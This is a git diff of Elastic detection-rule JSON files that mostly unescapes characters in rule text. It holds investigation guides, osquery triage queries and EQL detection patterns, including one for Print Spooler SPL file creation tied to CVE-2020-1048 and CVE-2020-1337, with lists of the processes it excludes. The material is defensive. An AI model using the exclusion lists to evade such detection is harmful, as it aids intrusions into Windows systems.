integration matches against an event that contains registry data.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Check related threat reports to gain context about the registry indicator of compromise (IoC) and to understand if it's a system-native mechanism abused for persistence, to store data, to disable security mechanisms, etc. Use this information to define the appropriate triage and respond steps.\n- Identify the process responsible for the registry operation and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries can leverage dual-use registry mechanisms that are commonly used by normal applications. These registry keys can be added into indicator lists creating the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "registry.path:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -115,7 +115,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.registry.path:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json index 9d77ca77a8f..feabc51e460 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json index 78502a8c15f..40ffa5fd5c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_106.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json index 47b753d20d9..fa224b682a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_107.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json index a2af81aaec9..9e55eda8931 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_108.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json index 7291165b988..88fe2cdee34 100644 --- a/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/a624863f-a70d-417f-a7d2-7a404638d47f_109.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json index 6946af1f570..989179d781d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_102.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json index ce2d3186f3f..a1f7250e66d 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_103.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json index 0e8b172f570..d028bedd08e 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_104.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json index db6543473ac..959be9097c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_105.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json index 303b584002a..77db6001768 100644 --- a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_106.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json index ee55ed5f0ef..0825ef7b001 100644 --- a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json index 234e8bcccb8..729c909baac 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" @@ -68,7 +68,7 @@ ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json index d28c98065be..dd87ff8ca35 100644 --- a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler SPL File Created", - "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by 